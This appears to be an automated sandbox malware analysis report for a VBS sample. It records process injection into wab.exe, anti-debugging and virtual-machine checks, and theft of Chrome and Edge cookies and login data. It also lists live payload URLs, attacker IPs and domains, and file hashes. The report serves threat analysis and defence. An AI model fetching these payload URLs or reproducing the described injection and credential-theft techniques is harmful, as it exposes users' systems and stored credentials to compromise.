Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6648	Thread sleep count: 966 > 30	Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\xcopy.exe	Last function: Thread delayed

Source: wab.exe, 0000001B.00000002.3468143116.0000000000D68000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: wscript.exe, 00000000.00000002.2228998163.0000022CC0BC0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: wscript.exe, 00000000.00000003.2183688264.0000022CC0EBD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2225913246.0000022CC0EBD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2229406049.0000022CC0EBD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2183592062.0000022CC0EBD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW0
Source: wscript.exe, 00000000.00000003.2183808324.0000022CC0C12000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2226248276.0000022CC0C12000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2182822284.0000022CC0C12000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2223236655.0000022CC0C12000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2229181627.0000022CC0C12000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: powershell.exe, 00000008.00000002.3550837263.000001EF41514000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread information set: HideFromDebugger			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread information set: HideFromDebugger			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\xcopy.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Program Files (x86)\wgDrSTbxuDuJLxUFixRFuyhAkBSOdBneRpJXCfVkaeok\TsrCaEwNrfOKANGWcsg.exe	NtResumeThread: Direct from: 0x773836AC	Jump to behavior
Source: C:\Program Files (x86)\wgDrSTbxuDuJLxUFixRFuyhAkBSOdBneRpJXCfVkaeok\TsrCaEwNrfOKANGWcsg.exe	NtMapViewOfSection: Direct from: 0x77382D1C	Jump to behavior
Source: C:\Program Files (x86)\wgDrSTbxuDuJLxUFixRFuyhAkBSOdBneRpJXCfVkaeok\TsrCaEwNrfOKANGWcsg.exe	NtWriteVirtualMemory: Direct from: 0x77382E3C	Jump to behavior
Source: C:\Program Files (x86)\wgDrSTbxuDuJLxUFixRFuyhAkBSOdBneRpJXCfVkaeok\TsrCaEwNrfOKANGWcsg.exe	NtProtectVirtualMemory: Direct from: 0x77382F9C	Jump to behavior
Source: C:\Program Files (x86)\wgDrSTbxuDuJLxUFixRFuyhAkBSOdBneRpJXCfVkaeok\TsrCaEwNrfOKANGWcsg.exe	NtSetInformationThread: Direct from: 0x773763F9	Jump to behavior
Source: C:\Program Files (x86)\wgDrSTbxuDuJLxUFixRFuyhAkBSOdBneRpJXCfVkaeok\TsrCaEwNrfOKANGWcsg.exe	NtCreateMutant: Direct from: 0x773835CC	Jump to behavior
Source: C:\Program Files (x86)\wgDrSTbxuDuJLxUFixRFuyhAkBSOdBneRpJXCfVkaeok\TsrCaEwNrfOKANGWcsg.exe	NtNotifyChangeKey: Direct from: 0x77383C2C	Jump to behavior
Source: C:\Program Files (x86)\wgDrSTbxuDuJLxUFixRFuyhAkBSOdBneRpJXCfVkaeok\TsrCaEwNrfOKANGWcsg.exe	NtSetInformationProcess: Direct from: 0x77382C5C	Jump to behavior
Source: C:\Program Files (x86)\wgDrSTbxuDuJLxUFixRFuyhAkBSOdBneRpJXCfVkaeok\TsrCaEwNrfOKANGWcsg.exe	NtCreateUserProcess: Direct from: 0x7738371C	Jump to behavior
Source: C:\Program Files (x86)\wgDrSTbxuDuJLxUFixRFuyhAkBSOdBneRpJXCfVkaeok\TsrCaEwNrfOKANGWcsg.exe	NtQueryInformationProcess: Direct from: 0x77382C26	Jump to behavior
Source: C:\Program Files (x86)\wgDrSTbxuDuJLxUFixRFuyhAkBSOdBneRpJXCfVkaeok\TsrCaEwNrfOKANGWcsg.exe	NtResumeThread: Direct from: 0x77382FBC	Jump to behavior
Source: C:\Program Files (x86)\wgDrSTbxuDuJLxUFixRFuyhAkBSOdBneRpJXCfVkaeok\TsrCaEwNrfOKANGWcsg.exe	NtWriteVirtualMemory: Direct from: 0x7738490C	Jump to behavior
Source: C:\Program Files (x86)\wgDrSTbxuDuJLxUFixRFuyhAkBSOdBneRpJXCfVkaeok\TsrCaEwNrfOKANGWcsg.exe	NtOpenKeyEx: Direct from: 0x77383C9C	Jump to behavior
Source: C:\Program Files (x86)\wgDrSTbxuDuJLxUFixRFuyhAkBSOdBneRpJXCfVkaeok\TsrCaEwNrfOKANGWcsg.exe	NtReadFile: Direct from: 0x77382ADC	Jump to behavior
Source: C:\Program Files (x86)\wgDrSTbxuDuJLxUFixRFuyhAkBSOdBneRpJXCfVkaeok\TsrCaEwNrfOKANGWcsg.exe	NtAllocateVirtualMemory: Direct from: 0x77382BFC	Jump to behavior
Source: C:\Program Files (x86)\wgDrSTbxuDuJLxUFixRFuyhAkBSOdBneRpJXCfVkaeok\TsrCaEwNrfOKANGWcsg.exe	NtDelayExecution: Direct from: 0x77382DDC	Jump to behavior
Source: C:\Program Files (x86)\wgDrSTbxuDuJLxUFixRFuyhAkBSOdBneRpJXCfVkaeok\TsrCaEwNrfOKANGWcsg.exe	NtQuerySystemInformation: Direct from: 0x77382DFC	Jump to behavior
Source: C:\Program Files (x86)\wgDrSTbxuDuJLxUFixRFuyhAkBSOdBneRpJXCfVkaeok\TsrCaEwNrfOKANGWcsg.exe	NtOpenSection: Direct from: 0x77382E0C	Jump to behavior
Source: C:\Program Files (x86)\wgDrSTbxuDuJLxUFixRFuyhAkBSOdBneRpJXCfVkaeok\TsrCaEwNrfOKANGWcsg.exe	NtQueryVolumeInformationFile: Direct from: 0x77382F2C	Jump to behavior
Source: C:\Program Files (x86)\wgDrSTbxuDuJLxUFixRFuyhAkBSOdBneRpJXCfVkaeok\TsrCaEwNrfOKANGWcsg.exe	NtQuerySystemInformation: Direct from: 0x773848CC	Jump to behavior
Source: C:\Program Files (x86)\wgDrSTbxuDuJLxUFixRFuyhAkBSOdBneRpJXCfVkaeok\TsrCaEwNrfOKANGWcsg.exe	NtReadVirtualMemory: Direct from: 0x77382E8C	Jump to behavior
Source: C:\Program Files (x86)\wgDrSTbxuDuJLxUFixRFuyhAkBSOdBneRpJXCfVkaeok\TsrCaEwNrfOKANGWcsg.exe	NtCreateKey: Direct from: 0x77382C6C	Jump to behavior
Source: C:\Program Files (x86)\wgDrSTbxuDuJLxUFixRFuyhAkBSOdBneRpJXCfVkaeok\TsrCaEwNrfOKANGWcsg.exe	NtClose: Direct from: 0x77382B6C
Source: C:\Program Files (x86)\wgDrSTbxuDuJLxUFixRFuyhAkBSOdBneRpJXCfVkaeok\TsrCaEwNrfOKANGWcsg.exe	NtAllocateVirtualMemory: Direct from: 0x773848EC	Jump to behavior
Source: C:\Program Files (x86)\wgDrSTbxuDuJLxUFixRFuyhAkBSOdBneRpJXCfVkaeok\TsrCaEwNrfOKANGWcsg.exe	NtQueryAttributesFile: Direct from: 0x77382E6C	Jump to behavior
Source: C:\Program Files (x86)\wgDrSTbxuDuJLxUFixRFuyhAkBSOdBneRpJXCfVkaeok\TsrCaEwNrfOKANGWcsg.exe	NtSetInformationThread: Direct from: 0x77382B4C	Jump to behavior
Source: C:\Program Files (x86)\wgDrSTbxuDuJLxUFixRFuyhAkBSOdBneRpJXCfVkaeok\TsrCaEwNrfOKANGWcsg.exe	NtQueryInformationToken: Direct from: 0x77382CAC	Jump to behavior
Source: C:\Program Files (x86)\wgDrSTbxuDuJLxUFixRFuyhAkBSOdBneRpJXCfVkaeok\TsrCaEwNrfOKANGWcsg.exe	NtOpenKeyEx: Direct from: 0x77382B9C	Jump to behavior
Source: C:\Program Files (x86)\wgDrSTbxuDuJLxUFixRFuyhAkBSOdBneRpJXCfVkaeok\TsrCaEwNrfOKANGWcsg.exe	NtQueryValueKey: Direct from: 0x77382BEC	Jump to behavior
Source: C:\Program Files (x86)\wgDrSTbxuDuJLxUFixRFuyhAkBSOdBneRpJXCfVkaeok\TsrCaEwNrfOKANGWcsg.exe	NtDeviceIoControlFile: Direct from: 0x77382AEC	Jump to behavior
Source: C:\Program Files (x86)\wgDrSTbxuDuJLxUFixRFuyhAkBSOdBneRpJXCfVkaeok\TsrCaEwNrfOKANGWcsg.exe	NtCreateFile: Direct from: 0x77382FEC	Jump to behavior
Source: C:\Program Files (x86)\wgDrSTbxuDuJLxUFixRFuyhAkBSOdBneRpJXCfVkaeok\TsrCaEwNrfOKANGWcsg.exe	NtOpenFile: Direct from: 0x77382DCC	Jump to behavior

Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: NULL target: C:\Program Files (x86)\wgDrSTbxuDuJLxUFixRFuyhAkBSOdBneRpJXCfVkaeok\TsrCaEwNrfOKANGWcsg.exe protection: execute and read and write	Jump to behavior
Source: C:\Program Files (x86)\wgDrSTbxuDuJLxUFixRFuyhAkBSOdBneRpJXCfVkaeok\TsrCaEwNrfOKANGWcsg.exe	Section loaded: NULL target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and write	Jump to behavior
Source: C:\Program Files (x86)\wgDrSTbxuDuJLxUFixRFuyhAkBSOdBneRpJXCfVkaeok\TsrCaEwNrfOKANGWcsg.exe	Section loaded: NULL target: C:\Windows\SysWOW64\xcopy.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\xcopy.exe	Section loaded: NULL target: C:\Program Files (x86)\wgDrSTbxuDuJLxUFixRFuyhAkBSOdBneRpJXCfVkaeok\TsrCaEwNrfOKANGWcsg.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\xcopy.exe	Section loaded: NULL target: C:\Program Files (x86)\wgDrSTbxuDuJLxUFixRFuyhAkBSOdBneRpJXCfVkaeok\TsrCaEwNrfOKANGWcsg.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\xcopy.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 3240000			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 323FA28			Jump to behavior

Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior

Source: C:\Windows\SysWOW64\xcopy.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\xcopy.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\xcopy.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\xcopy.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\SysWOW64\xcopy.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\xcopy.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\xcopy.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\xcopy.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior

IP	Domain	Country	ASN	ASN Name	Malicious
142.251.40.206	google.com	United States	15169	GOOGLEUS	false
34.174.122.2	www.facesofhoustontx.com	United States	2686	ATGS-MMD-ASUS	true
87.121.105.54	unknown	Bulgaria	43561	NET1-ASBG	false

Windows Analysis Report 01105751.vbs

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel Provided by

Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report
01105751.vbs

Malware Threat Intel
Provided by

Name	IP	Active
bg.microsoft.map.fastly.net	199.232.214.172	true
google.com	142.251.40.206	true
www.facesofhoustontx.com	34.174.122.2	true
timesrenewables.com	3.33.130.190	true
www.timesrenewables.com	unknown	unknown

Name	Malicious	Antivirus Detection	Reputation
http://87.121.105.54/iYbZIhIVLPBjJUzImyrJN72.bin	false	Avira URL Cloud: safe	unknown
http://www.facesofhoustontx.com/gnto/?P2v=kzXtiRyPGhR4rzp&4v8xJ8=F2aKH/UhYyQy5bhtG47arqZTAzYBZHKo8pZvH2jiqbKPAiUNCKzfvPloMCIQjvvo+O//vWhBzU38U00+OJnukLQGsUBXCgymNTKCViCR5sTiLbhUlqXxexqjYjSB6xlfqI4lO2I=	true	Avira URL Cloud: safe	unknown
http://87.121.105.54/Ommestrup.deploy	false	Avira URL Cloud: safe	unknown

ID:	1435413
Product:	CloudBasic
Start time:	17:12:06
Start date:	02.05.2024
Sample:	01105751.vbs
Cookbook:	default.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	5c7e4886e009c7d2908ec633bf48cf8e
SHA1:	72e9f5c65571b19402febfa7f36fc6ee5ce9a0f3
SHA256:	c950aba2061fbb90b63122bec04b71764966e5554b6cd40114772c392464f748

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506	Microsoft Cabinet archive data, Windows 2000/XP setup, 69993 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression	29F65BA8E88C063813CC50A4EA544E93	05A7040D5C127E68C25D81CC51271FFB8BEF3568	1ED81FA8DFB6999A9FEDC6E779138FFD99568992E22D300ACD181A6D2C8DE184
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506	data	10CC8E4171181F40D3F3902F346989CF	C6C21A031D7A5C0F69B96092C19E833F685CB2CF	103BCC6A1183F4644E456B6E4FBC8113C71830BD3ED212D8AF238BAAB63FA1D6
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache	data	C7F7A26360E678A83AFAB85054B538EA	B9C885922370EE7573E7C8CF0DDB8D97B7F6F022	C3D527BCA7A1D1A398F5BE0C70237BD69281601DFD7D1ED6D389B2FD8E3BC713
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	data	F23953D4A58E404FCB67ADD0C45EB27A	2D75B5CACF2916C66E440F19F6B3B21DFD289340	16F994BFB26D529E4C28ED21C6EE36D4AFEAE01CEEB1601E85E0E7FDFF4EFA8B
C:\Users\user\AppData\Local\Temp\-507JlJ26-	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8	271D5F995996735B01672CF227C81C17	7AEAACD66A59314D1CBF4016038D3A0A956BAF33	9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_b4c0somd.z5j.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_l1g2jvys.sae.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pfnknd33.sdq.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pvscwo21.fkk.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Roaming\Sagsgningerne.Int	ASCII text, with very long lines (65536), with no line terminators	C7906DD3AFFB5AB9D5B82F6E14064C4B	BDC1903A713B8E82E10D1ACADA68110988885416	1BE80920D652FC9BF4CD1A46EEFCDED743B7D37B3EED7C13446974119BBD1795